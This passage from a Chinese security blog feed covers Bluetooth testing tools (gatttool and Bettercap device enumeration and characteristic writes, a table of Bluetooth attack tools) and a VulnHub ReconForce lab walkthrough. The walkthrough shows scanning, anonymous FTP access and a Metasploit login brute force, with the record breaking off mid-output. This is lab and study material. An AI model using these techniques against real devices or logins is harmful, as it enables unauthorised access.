gatttool</h3><p>GATTool 允许与另一个设备建立连接,列出该设备的特性,并读取和写入其属性。 GATTTool 可以使用 -I 选项启动交互式 shell</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br></pre></td><td class="code"><pre><span class="line">gatttool -i hci0 -I</span><br><span class="line">[ ][LE]> connect 24:62:AB:B1:A8:3E Attempting to connect to A4:CF:12:6C:B3:76 Connection successful</span><br><span class="line">[A4:CF:12:6C:B3:76][LE]> characteristics</span><br><span class="line"> handle: 0x0002, char properties: 0x20, char value handle:</span><br><span class="line"> 0x0003, uuid: 00002a05-0000-1000-8000-00805f9b34fb</span><br><span class="line"> handle: 0x0015, char properties: 0x02, char value handle:</span><br><span class="line"> 0x0016, uuid: 00002a00-0000-1000-8000-00805f9b34fb</span><br><span class="line">[...]</span><br><span class="line"></span><br><span class="line"># Write data</span><br><span class="line">gatttool -i <Bluetooth adapter interface> -b <MAC address of device> --char-write-req <characteristic handle> -n <value></span><br><span class="line">gatttool -b a4:cf:12:6c:b3:76 --char-write-req -a 0x002e -n $(echo -n "04dc54d9053b4307680a"|xxd -ps)</span><br><span class="line"></span><br><span class="line"># Read data</span><br><span class="line">gatttool -i <Bluetooth adapter interface> -b <MAC address of device> --char-read -a 0x16</span><br><span class="line"></span><br><span class="line"># Read connecting with an authenticated encrypted connection</span><br><span class="line">gatttool --sec-level=high -b a4:cf:12:6c:b3:76 --char-read -a 0x002c</span><br></pre></td></tr></table></figure><h3 id="2-8-Bettercap"><a href="#2-8-Bettercap" class="headerlink" title="2.8 Bettercap"></a>2.8 Bettercap</h3><p>Bettercap是<a href="https://null-byte.wonderhowto.com/how-to/use-ettercap-intercept-passwords-with-arp-spoofing-0191191/">Ettercap</a>的继任者,具有用于许多不同类型的无线电和网络技术的攻击模块。</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line"># Start listening for beacons</span><br><span class="line"># 启动BLE嗅探</span><br><span class="line">sudo bettercap --eval "ble.recon on"</span><br><span class="line"></span><br><span class="line"># 也可以进入bettercap交互模式键入"ble.recon on"启动BLE嗅探</span><br></pre></td></tr></table></figure><p>如下图所示可以看到嗅探到大量蓝牙设备</p><p><img src="/2023/10/22/%E8%93%9D%E7%89%99%E5%B7%A5%E5%85%B7/image-20231022232501595.png" alt="image-20231022232501595"></p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line"></span><br><span class="line"></span><br><span class="line"># Wait some time</span><br><span class="line">>> ble.show # Show discovered devices</span><br><span class="line">>> ble.enum <mac addr> # This will show the service, characteristics and properties supported</span><br><span class="line"></span><br><span class="line"># Write data in a characteristic</span><br><span class="line">>> ble.write <MAC ADDR> <UUID> <HEX DATA></span><br><span class="line">>> ble.write <mac address of device> ff06 68656c6c6f # Write "hello" in ff06</span><br></pre></td></tr></table></figure><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"># 查看嗅探到的蓝牙设备</span><br><span class="line">ble.show</span><br></pre></td></tr></table></figure><p><img src="/2023/10/22/%E8%93%9D%E7%89%99%E5%B7%A5%E5%85%B7/image-20231022232738643.png" alt="image-20231022232738643"></p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"># 枚举有关该设备的详细信息</span><br><span class="line">ble.enum MAC地址</span><br></pre></td></tr></table></figure><p><img src="/2023/10/22/%E8%93%9D%E7%89%99%E5%B7%A5%E5%85%B7/image-20231022233011754.png" alt="image-20231022233011754"></p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line"># 写入数据</span><br><span class="line">ble.write MAC地址 <UUID> <HEX DATA></span><br><span class="line"></span><br></pre></td></tr></table></figure><p><img src="/2023/10/22/%E8%93%9D%E7%89%99%E5%B7%A5%E5%85%B7/image-20231023001345230.png" alt="image-20231023001345230"></p><p>途中方框中存在写入权限。</p><p>尝试写入<code>hello</code>到<code>2f7cabce808d411f9a0cbb92ba96c102</code>但尝试写入失败。</p><p><img src="/2023/10/22/%E8%93%9D%E7%89%99%E5%B7%A5%E5%85%B7/image-20231023001655441.png" alt="image-20231023001655441"></p><p><img src="/2023/10/22/%E8%93%9D%E7%89%99%E5%B7%A5%E5%85%B7/image-20231023001548387.png" alt="image-20231023001548387"></p><p>虽然我们无法写入此蓝牙设备,但许多设备都可以。如果我们了解到设备正在运行一个服务,其漏洞可以通过写入值来利用,我们可以使用 Bettercap 开始寻找进一步利用附近设备的方法。</p><h3 id="2-9-wireshark"><a href="#2-9-wireshark" class="headerlink" title="2.9 wireshark"></a>2.9 wireshark</h3><p>通过手机抓取蓝牙包并分析</p><p>设置-我的设备-全部参数-状态信息 </p><p><img src="/2023/10/22/%E8%93%9D%E7%89%99%E5%B7%A5%E5%85%B7/image-20231022215844632.png" alt="image-20231022215844632"></p><p>红米手机log日志路径为</p><p> /data/misc/bluetooth/logs </p><p>通过wireshark读取蓝牙版本信息</p><p>搜索字符串<code>Read Remote Version Information Complete</code></p><p><img src="/2023/10/22/%E8%93%9D%E7%89%99%E5%B7%A5%E5%85%B7/image-20231022230543710.png" alt="image-20231022230543710"></p><h2 id="3-蓝牙存在的安全威胁"><a href="#3-蓝牙存在的安全威胁" class="headerlink" title="3.蓝牙存在的安全威胁"></a>3.蓝牙存在的安全威胁</h2><h4 id="3-1基于蓝牙版本的威胁"><a href="#3-1基于蓝牙版本的威胁" class="headerlink" title="3.1基于蓝牙版本的威胁"></a>3.1基于蓝牙版本的威胁</h4><p>1、蓝牙1.2之前的版本: 基于单元密钥的链接密钥都是静态的且在每个配对中被重复使用。一旦设备的单元密钥被泄露(即当第一次配对的时候),任何其他拥有该密钥的设备能够欺骗该设备或任何其他已经与该设备配对的设备。</p><p>2、蓝牙2.1+ EDR之前的版本:允许使用短PIN码。这些PIN码长度较短,容易被攻击者猜到。加密密钥流是依赖于链路密钥、EN_RAND、主设备BD_ADDR和时钟。在一个特定加密的连接中,只有主设备时钟会发生改变。如果连接持续时间超过23.3小时,时钟值将开始重复,从而产生一个与之前连接中使用的相同的密钥流。重复的密钥流是一个严重的加密漏洞,这将让攻击者确定原始明文。</p><p>3、蓝牙2.1到3.0版本: 安全模式4的设备(即v2.1或更高版本的)与不支持安全模式4(即v2.0及更早版本)的设备连接时,其被允许回退到任何其他安全模式。例如,可能会使用不提供任何安全性的安全模式1,使得版本2.1到3.0更容易受到攻击。此外,版本2.1到3.0版本中使用了SSP静态密钥,这大大增加了设备遭受中间人攻击的可能性。</p><p>4、蓝牙4.0之前的版本:支持无限数量的身份请求,攻击者能够获得许多登录申请的返回的信息。这使他们能够轻易的破解链接密钥。这是因为蓝牙BR/EDR加密所用的E0流密码算法是相对较弱的。</p><p>5、所有版本: 如果没有通过访问控制来安全地存储和保护链接密钥,密钥可能被攻击者读取或修改。加密密钥的长度太短;没有用户身份验证;可被发现/可连接的设备都会容易受到攻击。</p><h4 id="3-2基于攻击类型的威胁"><a href="#3-2基于攻击类型的威胁" class="headerlink" title="3.2基于攻击类型的威胁"></a>3.2基于攻击类型的威胁</h4><table><thead><tr><th><strong>分类</strong></th><th><strong>说明</strong></th><th><strong>威胁与工具集</strong></th></tr></thead><tbody><tr><td><strong>伪装</strong></td><td>保护攻击者的身份</td><td>HCIConfig(隐藏设备名称)</td></tr><tr><td>HCIConfig/BTclass(隐藏设备类别)</td><td></td><td></td></tr><tr><td>BD_addr(隐藏设备地址)</td><td></td><td></td></tr><tr><td>Spooftooph(进行设备克隆)</td><td></td><td></td></tr><tr><td><strong>监视</strong></td><td>进行信息采集</td><td>HCITool(发现周边设备)</td></tr><tr><td>Sdptool(服务层设备扫描)</td><td></td><td></td></tr><tr><td>Redfang(发现隐藏设备)</td><td></td><td></td></tr><tr><td>Blueprinter(远程采集蓝牙设备指纹)</td><td></td><td></td></tr><tr><td>BT_audit(蓝牙审计)</td><td></td><td></td></tr><tr><td>War-Nibbling(不安全蓝牙设备扫描)</td><td></td><td></td></tr><tr><td>Bluefish(搜索蓝牙设备)</td><td></td><td></td></tr><tr><td>Bluescanner(搜索蓝牙设备)</td><td></td><td></td></tr><tr><td><strong>增强范围</strong></td><td>信号放大</td><td>Bluetooone(图2)</td></tr><tr><td><strong>嗅探</strong></td><td>蓝牙通信抓包</td><td>BlueSniff</td></tr><tr><td>HCIDump(HCI数据分析)</td><td></td><td></td></tr><tr><td>Ubertooth</td><td></td><td></td></tr><tr><td><strong>中间人攻击</strong></td><td>伪造身份信息管道端的数据篡改与抓取。</td><td>Bthidproxy(蓝牙中间人分析工具)</td></tr><tr><td><strong>Snarf攻击</strong></td><td>未认证的攻击</td><td>Bluesnarfer</td></tr><tr><td>Blooover</td><td></td><td></td></tr><tr><td>BTCrack(Pin码破解工具)</td><td></td><td></td></tr><tr><td>Carwhisperer(无屏幕蓝牙设备测试工具)</td><td></td><td></td></tr><tr><td>Helomoto</td><td></td><td></td></tr><tr><td>Bluebugger(蓝牙漏洞测试)</td><td></td><td></td></tr><tr><td>HID attack(人机接口设备攻击)</td><td></td><td></td></tr><tr><td>Btaptap(蓝牙键盘嗅探)</td><td></td><td></td></tr><tr><td><strong>拒绝服务</strong></td><td>进行拒绝服务攻击</td><td>BlueSmack(L2CAP协议攻击)</td></tr><tr><td>BlueJacking(匿名名片发送)</td><td></td><td></td></tr><tr><td>Smurf(ICMP请求攻击)</td><td></td><td></td></tr><tr><td>信号攻击</td><td></td><td></td></tr><tr><td>PingBlender(Syn洪水攻击)</td><td></td><td></td></tr><tr><td>电池耗尽攻击</td><td></td><td></td></tr><tr><td><strong>漏洞攻击</strong></td><td>通过代码逻辑及安全漏洞进行入侵</td><td>Bluebag (图3)(背包客攻击蓝牙)</td></tr><tr><td>Caribe病毒</td><td></td><td></td></tr><tr><td>Blueborne 漏洞</td><td></td><td></td></tr><tr><td>CVE-2020-0022</td><td></td><td></td></tr><tr><td><strong>模糊测试</strong></td><td>通过注入随机数据来触发安全bug</td><td>BSS(Bluetooth Stack Smasher 蓝牙协议栈模糊测试)</td></tr><tr><td>HCIDUMP(HCI数据分析)</td><td></td><td></td></tr><tr><td>L2cap 模糊测试</td><td></td><td></td></tr></tbody></table><h2 id="参考链接"><a href="#参考链接" class="headerlink" title="参考链接"></a>参考链接</h2><p><a href="https://github.com/apachecn/apachecn-kali-zh/blob/master/docs/kali-linux-wless-pentest-cb/7.md">apachecn-kali-zh/docs/kali-linux-wless-pentest-cb/7.md at master · apachecn/apachecn-kali-zh (github.com)</a></p><p><a href="https://zhuanlan.zhihu.com/p/559754959">Bluez测试命令汇总 - 知乎 (zhihu.com)</a></p><p><a href="https://cloud.tencent.com/developer/article/2276836?areaId=106001">kali中嗅探蓝牙设备-腾讯云开发者社区-腾讯云 (tencent.com)</a></p><p><a href="https://www.freebuf.com/articles/wireless/258153.html">蓝牙的安全与威胁(上) - FreeBuf网络安全行业门户</a></p><p><a href="https://www.freebuf.com/articles/neopoints/258561.html">蓝牙的安全与威胁(中) - FreeBuf网络安全行业门户</a></p><p><a href="https://www.freebuf.com/articles/neopoints/261295.html">蓝牙的安全与威胁(下) - FreeBuf网络安全行业门户</a></p><p><a href="https://www.infoobs.com/article/20220909/55208.html">11种常见的蓝牙攻击方法简析 | 信息化观察网 - 引领行业变革 (infoobs.com)</a></p><p><a href="https://book.hacktricks.xyz/todo/radio-hacking/pentesting-ble-bluetooth-low-energy">渗透测试 BLE - 低功耗蓝牙 - 黑客技巧 (hacktricks.xyz)</a></p><p><a href="https://medium.com/@mks_01/bluetooth-low-energy-recon-using-bettercap-a53bb1b46e93">Bluetooth Low Energy recon using Bettercap | by MKS | Medium</a></p><p><a href="https://zhuanlan.zhihu.com/p/79997196">获取你耳机的蓝牙版本 - 知乎 (zhihu.com)</a></p><p><a href="https://null-byte.wonderhowto.com/how-to/target-bluetooth-devices-with-bettercap-0194421/">How to Target Bluetooth Devices with Bettercap « Null Byte :: WonderHowTo</a></p>]]></content>
<categories>
<category> 工具 </category>
</categories>
<tags>
<tag> 渗透 </tag>
<tag> 蓝牙 </tag>
</tags>
</entry>
<entry>
<title>ReconForce</title>
<link href="/2023/10/21/ReconForce/"/>
<url>/2023/10/21/ReconForce/</url>
<content type="html"><![CDATA[<h1 id="ReconForce"><a href="#ReconForce" class="headerlink" title="ReconForce"></a>ReconForce</h1><p>靶机地址<a href="https://www.vulnhub.com/entry/hacknos-reconforce,416/">hackNos: ReconForce (v1.1) ~ VulnHub</a></p><p>目标为user.txt和root.txt</p><h2 id="靶机配置"><a href="#靶机配置" class="headerlink" title="靶机配置"></a>靶机配置</h2><p>将靶机下载好后。在VM中选择打开虚拟机,在开启虚拟机之前,网络设置中调整为nat(与攻击机kali一个网段)。</p><h2 id="渗透测试"><a href="#渗透测试" class="headerlink" title="渗透测试"></a>渗透测试</h2><h3 id="使用nmap进行扫描"><a href="#使用nmap进行扫描" class="headerlink" title="使用nmap进行扫描"></a>使用nmap进行扫描</h3><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br></pre></td><td class="code"><pre><span class="line">└─# nmap -p- -sV -sT -T4 192.168.5.132</span><br><span class="line">Starting Nmap 7.91 ( https://nmap.org ) at 2022-03-24 17:23 CST</span><br><span class="line">Nmap scan report for 192.168.5.132</span><br><span class="line">Host is up (0.0012s latency).</span><br><span class="line">Not shown: 65532 closed ports</span><br><span class="line">PORT STATE SERVICE VERSION</span><br><span class="line">21/tcp open ftp vsftpd 2.0.8 or later</span><br><span class="line">22/tcp open ssh OpenSSH 8.0p1 Ubuntu 6build1 (Ubuntu Linux; protocol 2.0)</span><br><span class="line">80/tcp open http Apache httpd 2.4.41 ((Ubuntu))</span><br><span class="line">MAC Address: 00:0C:29:48:11:36 (VMware)</span><br><span class="line">Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel</span><br><span class="line"></span><br><span class="line">Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .</span><br><span class="line">Nmap done: 1 IP address (1 host up) scanned in 13.34 seconds</span><br><span class="line"></span><br></pre></td></tr></table></figure><h3 id="目录扫描"><a href="#目录扫描" class="headerlink" title="目录扫描"></a>目录扫描</h3><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br></pre></td><td class="code"><pre><span class="line">└─# dirsearch -u "http://192.168.5.132" -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt </span><br><span class="line"></span><br><span class="line"> _|. _ _ _ _ _ _|_ v0.4.1</span><br><span class="line"> (_||| _) (/_(_|| (_| )</span><br><span class="line"></span><br><span class="line">Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 30 | Wordlist size: 220520</span><br><span class="line"></span><br><span class="line">Output File: /root/.dirsearch/reports/192.168.5.132/_21-09-17_09-25-26.txt</span><br><span class="line"></span><br><span class="line">Error Log: /root/.dirsearch/logs/errors-21-09-17_09-25-26.log</span><br><span class="line"></span><br><span class="line">Target: http://192.168.5.132/</span><br><span class="line"></span><br><span class="line">[09:25:27] Starting: </span><br><span class="line">[09:25:27] 301 - 312B - /css -> http://192.168.5.132/css/</span><br><span class="line">[09:27:52] 403 - 278B - /server-status </span><br><span class="line"> </span><br><span class="line">Task Completed</span><br></pre></td></tr></table></figure><p>那么访问主页。点击中间的TroubleShoot,会发现一个登录,并且URL变为<code>http://192.168.5.132/5ecure/</code></p><p><img src="/2023/10/21/ReconForce/image-20230628230938400.png" alt="image-20230628230938400"></p><p><img src="/2023/10/21/ReconForce/image-20230628231004177.png" alt="image-20230628231004177"></p><p>上面的文字为<code>is requesting your username and password. The site says: “Recon Security</code></p><h3 id="尝试ftp匿名登录"><a href="#尝试ftp匿名登录" class="headerlink" title="尝试ftp匿名登录"></a>尝试ftp匿名登录</h3><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><span class="line">└─# ftp 192.168.5.132</span><br><span class="line">Connected to 192.168.5.132.</span><br><span class="line">220 "Security@hackNos".</span><br><span class="line">Name (192.168.5.132:root): ftp</span><br><span class="line">331 Please specify the password.</span><br><span class="line">Password:</span><br><span class="line">230 Login successful.</span><br><span class="line">Remote system type is UNIX.</span><br><span class="line">Using binary mode to transfer files.</span><br><span class="line">ftp> ls</span><br><span class="line">200 PORT command successful. Consider using PASV.</span><br><span class="line">150 Here comes the directory listing.</span><br><span class="line">226 Directory send OK.</span><br><span class="line"></span><br></pre></td></tr></table></figure><p>发现一个<code>Security@hackNos</code></p><p>那么写一个字典,前面的随意。主要是要用用工具来爆破。</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">└─# cat passrecon </span><br><span class="line">Security@h</span><br><span class="line">admin</span><br><span class="line">asdf</span><br><span class="line">qwer</span><br><span class="line">aaaa</span><br><span class="line">Security@hackNos</span><br></pre></td></tr></table></figure><h3 id="使用msf进行http登录爆破"><a href="#使用msf进行http登录爆破" class="headerlink" title="使用msf进行http登录爆破"></a>使用msf进行http登录爆破</h3><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br><span class="line">84</span><br><span class="line">85</span><br><span class="line">86</span><br><span class="line">87</span><br><span class="line">88</span><br><span class="line">89</span><br><span class="line">90</span><br><span class="line">91</span><br><span class="line">92</span><br><span class="line">93</span><br><span class="line">94</span><br><span class="line">95</span><br><span class="line">96</span><br><span class="line">97</span><br><span class="line">98</span><br><span class="line">99</span><br><span class="line">100</span><br><span class="line">101</span><br><span class="line">102</span><br><span class="line">103</span><br><span class="line">104</span><br><span class="line">105</span><br><span class="line">106</span><br><span class="line">107</span><br><span class="line">108</span><br><span class="line">109</span><br><span class="line">110</span><br><span class="line">111</span><br><span class="line">112</span><br><span class="line">113</span><br><span class="line">114</span><br><span class="line">115</span><br><span class="line">116</span><br><span class="line">117</span><br><span class="line">118</span><br><span class="line">119</span><br><span class="line">120</span><br><span class="line">121</span><br><span class="line">122</span><br><span class="line">123</span><br><span class="line">124</span><br><span class="line">125</span><br><span class="line">126</span><br><span class="line">127</span><br><span class="line">128</span><br><span class="line">129</span><br><span class="line">130</span><br><span class="line">131</span><br><span class="line">132</span><br><span class="line">133</span><br><span class="line">134</span><br><span class="line">135</span><br><span class="line">136</span><br><span class="line">137</span><br><span class="line">138</span><br><span class="line">139</span><br><span class="line">140</span><br><span class="line">141</span><br><span class="line">142</span><br><span class="line">143</span><br><span class="line">144</span><br><span class="line">145</span><br><span class="line">146</span><br><span class="line">147</span><br><span class="line">148</span><br><span class="line">149</span><br><span class="line">150</span><br><span class="line">151</span><br><span class="line">152</span><br><span class="line">153</span><br><span class="line">154</span><br><span class="line">155</span><br><span class="line">156</span><br><span class="line">157</span><br><span class="line">158</span><br><span class="line">159</span><br><span class="line">160</span><br><span class="line">161</span><br><span class="line">162</span><br><span class="line">163</span><br><span class="line">164</span><br><span class="line">165</span><br><span class="line">166</span><br><span class="line">167</span><br><span class="line">168</span><br><span class="line">169</span><br><span class="line">170</span><br><span class="line">171</span><br><span class="line">172</span><br><span class="line">173</span><br><span class="line">174</span><br><span class="line">175</span><br><span class="line">176</span><br><span class="line">177</span><br><span class="line">178</span><br><span class="line">179</span><br><span class="line">180</span><br><span class="line">181</span><br><span class="line">182</span><br><span class="line">183</span><br><span class="line">184</span><br><span class="line">185</span><br><span class="line">186</span><br><span class="line">187</span><br><span class="line">188</span><br><span class="line">189</span><br><span class="line">190</span><br><span class="line">191</span><br><span class="line">192</span><br><span class="line">193</span><br><span class="line">194</span><br><span class="line">195</span><br><span class="line">196</span><br><span class="line">197</span><br><span class="line">198</span><br><span class="line">199</span><br></pre></td><td class="code"><pre><span class="line">└─# msfconsole </span><br><span class="line"> </span><br><span class="line"></span><br><span class="line">Unable to handle kernel NULL pointer dereference at virtual address 0xd34db33f</span><br><span class="line">EFLAGS: 00010046 </span><br><span class="line">eax: 00000001 ebx: f77c8c00 ecx: 00000000 edx: f77f0001 </span><br><span class="line">esi: 803bf014 edi: 8023c755 ebp: 80237f84 esp: 80237f60 </span><br><span class="line">ds: 0018 es: 0018 ss: 0018 </span><br><span class="line">Process Swapper (Pid: 0, process nr: 0, stackpage=80377000) </span><br><span class="line"> </span><br><span class="line"> </span><br><span class="line">Stack: 90909090990909090990909090 </span><br><span class="line"> 90909090990909090990909090 </span><br><span class="line"> 90909090.90909090.90909090 </span><br><span class="line"> 90909090.90909090.90909090 </span><br><span class="line"> 90909090.90909090.09090900 </span><br><span class="line"> 90909090.90909090.09090900 </span><br><span class="line"> .......................... </span><br><span class="line"> cccccccccccccccccccccccccc </span><br><span class="line"> cccccccccccccccccccccccccc </span><br><span class="line"> ccccccccc................. </span><br><span class="line"> cccccccccccccccccccccccccc </span><br><span class="line"> cccccccccccccccccccccccccc </span><br><span class="line"> .................ccccccccc </span><br><span class="line"> cccccccccccccccccccccccccc </span><br><span class="line"> cccccccccccccccccccccccccc </span><br><span class="line"> .......................... </span><br><span class="line"> ffffffffffffffffffffffffff </span><br><span class="line"> ffffffff.................. </span><br><span class="line"> ffffffffffffffffffffffffff </span><br><span class="line"> ffffffff.................. </span><br><span class="line"> ffffffff.................. </span><br><span class="line"> ffffffff.................. </span><br><span class="line"> </span><br><span class="line"></span><br><span class="line">Code: 00 00 00 00 M3 T4 SP L0 1T FR 4M 3W OR K! V3 R5 I0 N5 00 00 00 00</span><br><span class="line">Aiee, Killing Interrupt handler</span><br><span class="line">Kernel panic: Attempted to kill the idle task!</span><br><span class="line">In swapper task - not syncing </span><br><span class="line"></span><br><span class="line"></span><br><span class="line"> =[ metasploit v6.0.48-dev ]</span><br><span class="line">+ -- --=[ 2141 exploits - 1139 auxiliary - 365 post ]</span><br><span class="line">+ -- --=[ 596 payloads - 45 encoders - 10 nops ]</span><br><span class="line">+ -- --=[ 8 evasion ]</span><br><span class="line"></span><br><span class="line">Metasploit tip: When in a module, use back to go </span><br><span class="line">back to the top level prompt</span><br><span class="line"></span><br><span class="line">[*] Starting persistent handler(s)...</span><br><span class="line">msf6 > search http_login</span><br><span class="line"></span><br><span class="line">Matching Modules</span><br><span class="line">================</span><br><span class="line"></span><br><span class="line"> # Name Disclosure Date Rank Check Description</span><br><span class="line"> - ---- --------------- ---- ----- -----------</span><br><span class="line"> 0 auxiliary/scanner/http/dlink_dir_300_615_http_login normal No D-Link DIR-300A / DIR-320 / DIR-615D HTTP Login Utility</span><br><span class="line"> 1 auxiliary/scanner/http/dlink_dir_session_cgi_http_login normal No D-Link DIR-300B / DIR-600B / DIR-815 / DIR-645 HTTP Login Utility</span><br><span class="line"> 2 auxiliary/scanner/http/dlink_dir_615h_http_login normal No D-Link DIR-615H HTTP Login Utility</span><br><span class="line"> 3 auxiliary/scanner/http/http_login normal No HTTP Login Utility</span><br><span class="line"> 4 auxiliary/scanner/vmware/vmware_http_login normal No VMWare Web Login Scanner</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">Interact with a module by name or index. For example info 4, use 4 or use auxiliary/scanner/vmware/vmware_http_login</span><br><span class="line"></span><br><span class="line">msf6 > use 3</span><br><span class="line">msf6 auxiliary(scanner/http/http_login) > show options </span><br><span class="line"></span><br><span class="line">Module options (auxiliary/scanner/http/http_login):</span><br><span class="line"></span><br><span class="line"> Name Current Setting Required Description</span><br><span class="line"> ---- --------------- -------- -----------</span><br><span class="line"> AUTH_URI no The URI to authenticate against (default:auto)</span><br><span class="line"> BLANK_PASSWORDS false no Try blank passwords for all users</span><br><span class="line"> BRUTEFORCE_SPEED 5 yes How fast to bruteforce, from 0 to 5</span><br><span class="line"> DB_ALL_CREDS false no Try each user/password couple stored in the current database</span><br><span class="line"> DB_ALL_PASS false no Add all passwords in the current database to the list</span><br><span class="line"> DB_ALL_USERS false no Add all users in the current database to the list</span><br><span class="line"> PASS_FILE /usr/share/metasploit-framework/data/wordlists/http_default_pass.txt no File containing passwords, one per line</span><br><span class="line"> Proxies no A proxy chain of format type:host:port[,type:host:port][...]</span><br><span class="line"> REQUESTTYPE GET no Use HTTP-GET or HTTP-PUT for Digest-Auth, PROPFIND for WebDAV (default:GET)</span><br><span class="line"> RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'</span><br><span class="line"> RPORT 80 yes The target port (TCP)</span><br><span class="line"> SSL false no Negotiate SSL/TLS for outgoing connections</span><br><span class="line"> STOP_ON_SUCCESS false yes Stop guessing when a credential works for a host</span><br><span class="line"> THREADS 1 yes The number of concurrent threads (max one per host)</span><br><span class="line"> USERPASS_FILE /usr/share/metasploit-framework/data/wordlists/http_default_userpass.txt no File containing users and passwords separated by space, one pair per line</span><br><span class="line"> USER_AS_PASS false no Try the username as the password for all users</span><br><span class="line"> USER_FILE /usr/share/metasploit-framework/data/wordlists/http_default_users.txt no File containing users, one per line</span><br><span class="line"> VERBOSE true yes Whether to print output for all attempts</span><br><span class="line"> VHOST no HTTP server virtual host</span><br><span class="line"></span><br><span class="line">msf6 auxiliary(scanner/http/http_login) > set pass_file /root/cve/passrecon</span><br><span class="line">pass_file => /root/cve/passrecon</span><br><span class="line">msf6 auxiliary(scanner/http/http_login) > set auth_uri /5ecure/</span><br><span class="line">auth_uri => /5ecure/</span><br><span class="line">msf6 auxiliary(scanner/http/http_login) > set rhosts 192.168.5.132</span><br><span class="line">rhosts => 192.168.5.132</span><br><span class="line">msf6 auxiliary(scanner/http/http_login) > exploit </span><br><span class="line"></span><br><span class="line">[*] Attempting to login to http://192.168.5.132:80/5ecure/</span><br><span class="line">[-] 192.168.5.132:80 - Failed: 'admin:Security@h'</span><br><span class="line">[!] No active DB -- Credential data will not be saved!</span><br><span class="line">[-] 192.168.5.132:80 - Failed: 'admin:admin'</span><br><span class="line">[-] 192.168.5.132:80 - Failed: 'admin:asdf'</span><br><span class="line">[-] 192.168.5.132:80 - Failed: 'admin:qwer'</span><br><span class="line">[-] 192.168.5.132:80 - Failed: 'admin:aaaa'</span><br><span class="line">[+] 